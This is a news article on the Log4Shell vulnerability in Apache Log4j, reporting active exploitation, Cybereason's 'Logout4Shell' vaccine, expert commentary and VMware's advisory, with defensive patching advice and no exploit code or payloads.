3rd Party Risk Management , Application Security , Business Continuity Management / Disaster Recovery
Log4j: 'Vaccine' Released for Exploited Apache Zero-Day
Researchers Say Severity 10 Vulnerability Being Exploited by Access BrokersUrgent application of a temporary fix is advised as advanced persistent threat-level actors and access brokers are now reported to be conducting mass scanning for the zero-day vulnerability detected in the Java logging library Apache Log4j, which can result in full server takeover and leaves countless applications vulnerable.
See Also: Gartner Guide for Digital Forensics and Incident Response
Cisco Talos researchers say that they are seeing active exploitation on their honeypots network and sensor telemetry by APT-level actors. Cybersecurity firm GreyNoise says that a wide variety of use cases for this exploit have already begun to appear, ranging from exploiting Minecraft servers to more high-profile issues potentially affecting Apple iCloud.
On Friday evening, however, security firm Cybereason said it has developed and released an urgent "vaccine" for the easily exploitable flaw that was first detected in the popular game Minecraft, but cloud applications, including those widely used across the enterprise, also remain vulnerable. This includes software, web apps and products from Apple, Amazon, Cloudflare, Twitter and Steam.
The unauthenticated remote code execution vulnerability - classified as severe and tracked as CVE-2021-44228, with a CVSS score of 10 - is actively being exploited in the wild, and proof-of-concept code has been published, according to an advisory from CERT New Zealand on Friday (see: Severe Apache Log4j Vulnerability Threatens Enterprise Apps).
The advisory says that the systems and services using the Java logging library Apache Log4j between version 2.0 and 2.14.1 are vulnerable, including many applications and services written in Java.
Temporary Fix
Experts at Cybereason released an urgent fix for the vulnerability, available on GitHub. Researchers say that exploiting the flaw is trivial and an attacker can exploit the vulnerability by sending a malicious code string that gets logged by Log4j. At that point, the exploit will allow the attacker to load arbitrary Java code and take control of the server.
Researchers are recommending that affected systems apply patching as soon as possible. But Cybereason says it has found a way to disable the vulnerability for systems that can’t be updated - or at least not updated immediately.
"Logout4Shell is a vaccine to protect against exploits targeting the Log4Shell flaw. The fix uses the vulnerability itself to set the flag that turns it off. Because the vulnerability is so easy to exploit and so ubiquitous, it's one of the very few ways to close it in certain scenarios," Cybereason researchers say. "You can permanently close the vulnerability by causing the server to save a configuration file, but that is a more difficult proposition. The simplest solution is to set up a server that will download and then run a class that changes the server's configuration to not load things anymore."
But researchers recommend that users update immediately to the latest version to permanently remediate the vulnerability. This fix just disables the vulnerability and allows users to remain protected while they assess and update their servers, the researchers say.
Jake Williams, formerly a member of the U.S. National Security Agency's elite hacking team, tells Information Security Media Group that this vulnerability is extremely serious and it is a RCE, or remote code execution, vulnerability in a widely employed library.
"It's difficult to patch and because many organizations don't even realize they have the vulnerable library they may not be thinking about patching. The Cybereason vaccine is rather ingenious in that it prevents exploitation of a vulnerable server until it is restarted by exploiting the vulnerability," Williams, who is also the CTO of cybersecurity firm BreachQuest, tells ISMG. "The only concern with the vaccine is that some organizations may confuse this for a patch and not realize that they need to re-exploit the service every time it restarts. Even in cases where organizations understand the need, they may still leave the vulnerable server exposed for a time between a restart and applying the vaccine again.
Tim Mackey, principal security strategist, Synopsys Cybersecurity Research Center, describes the implications of Apache Log4j being the de facto way Java applications write their log information: “This means that a very large number of applications are potentially impacted by CVE-2021-44228, and we’ve already seen reports of just how easy it is to trigger the exploit. That’s the worrisome aspect of most zero-day vulnerabilities - that it’s easy to trigger and impacts a ubiquitous piece of software. In this case, exploit of CVE-2021-44228 can allow remote code to be executed, and while that’s problematic enough, the reality is there are likely other potential outcomes from an exploit - we just haven’t seen them or heard them reported. That’s because vulnerability disclosure isn’t a point-in-time activity. Instead, the disclosure serves as a trigger for security researchers and attackers alike to identify what other potential weaknesses the impacted code might have.”
Mackey advises: “Protecting against exposure to CVE-2021-44228 starts with a basic element of software supply chain risk management: Know the code that powers your business. If you don’t know which applications run Java and have a vulnerable version of Log4j, then you can’t guarantee you’ve patched everything. If you’re relying on periodic scans of software or configurations to determine whether you’re exposed to something, then it’s time to start looking at continuous monitoring for software supply chain issues and possibly implementing automated pen-testing capabilities. After all, it’s always possible for a vulnerable version of something that should’ve been patched to be used elsewhere or by a different supplier."
Further Exploitation
On Thursday, researchers at GreyNoise noticed that weaponized proof-of-concept exploits began to appear, leading to a rapid increase of scanning and public exploitation on Friday. Between noon EST and 2 p.m. EST on Friday, GreyNoise observed a five times increase in the number of hits per sensor related to the Log4shell event.
Williams states that he is not aware of any nation-state actors using the flaw, but he says it's definitely being exploited by access brokers, many of whom sell access to ransomware operators. And he says he has seen some RATs being dropped, which will be used by access brokers, but he believes it is too early for ransomware associated with this.
Researchers at GreyNoise have an updated list of all IP addresses opportunistically scanning the internet to vulnerability-check or exploit CVE-2021-44228, as described in this tag summary in the GreyNoise Visualizer.
VMware has released a critical security advisory for its multiple products that use the open-source Log4j Java logging component. The company has confirmed that exploitation attempts have occurred in the wild.
So far, the company has released a list of more than 25 products that could be affected by this vulnerability. The affected products included or currently under evaluation are VMware Horizon, VMware vCenter Server, VMware HCX, VMware NSX-T Data Center, Unified Access Gateway, WorkspaceOne Access, Identity Manager, vRealize Operations, vRealize Operations Cloud Proxy and vRealize Log Insight, among others.
"A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system," VMware says.